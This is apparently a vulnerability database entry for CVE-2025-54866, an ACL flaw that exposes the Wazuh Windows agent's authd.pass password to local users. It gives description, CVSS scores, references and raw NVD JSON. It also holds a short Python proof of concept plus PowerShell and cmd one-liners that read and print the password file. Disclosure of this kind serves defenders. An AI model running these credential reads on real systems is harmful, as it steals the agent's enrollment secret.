CVE-2025-54866

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.3.0 to before 4.13.0, a missing ACL on "C:\Program Files (x86)\ossec-agent\authd.pass" exposes the password to all "Authenticated Users" on the local machine. This issue has been patched in version 4.13.0.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE

Wazuh 4.3.0 至 4.13.0之前的版本（Windows平台）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-54866 PoC - Read Wazuh authd.pass file
# Requires: Local authenticated user access on Windows
import os

authd_pass_path = r"C:\Program Files (x86)\ossec-agent\authd.pass"

# Method 1: Direct file read
try:
    with open(authd_pass_path, 'r') as f:
        password = f.read().strip()
    print(f"[+] Successfully read authd.pass")
    print(f"[+] Password content: {password}")
except PermissionError:
    print("[-] Permission denied - file not accessible")
except FileNotFoundError:
    print("[-] File not found - Wazuh may not be installed")

# Method 2: Using PowerShell
# powershell -Command "Get-Content 'C:\Program Files (x86)\ossec-agent\authd.pass'"

# Method 3: Using cmd
# cmd /c "type \"C:\Program Files (x86)\ossec-agent\authd.pass\""

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-54866
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-54866
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-54866/
[4] VulDB https://vuldb.com/cve/CVE-2025-54866
[5] https://github.com/wazuh/wazuh/commit/606f19e688944ebe5d28d72eb81ac36f8fffb143
[6] https://github.com/wazuh/wazuh/pull/31187
[7] https://github.com/wazuh/wazuh/releases/tag/v4.13.0
[8] https://github.com/wazuh/wazuh/security/advisories/GHSA-mvfx-ph7m-qm37

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-54866", "sourceIdentifier": "[email protected]", "published": "2025-11-21T19:15:54.647", "lastModified": "2025-12-02T16:39:30.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.3.0 to before 4.13.0, a missing ACL on \"C:\\Program Files (x86)\\ossec-agent\\authd.pass\" exposes the password to all \"Authenticated Users\" on the local machine. This issue has been patched in version 4.13.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.3.0", "versionEndExcluding": "4.13.0", "matchCriteriaId": "9360EA52-202D-4851-AEC9-7551D9048B0F"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/commit/606f19e688944ebe5d28d72eb81ac36f8fffb143", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/wazuh/wazuh/pull/31187", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/wazuh/wazuh/releases/tag/v4.13.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-mvfx-ph7m-qm37", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}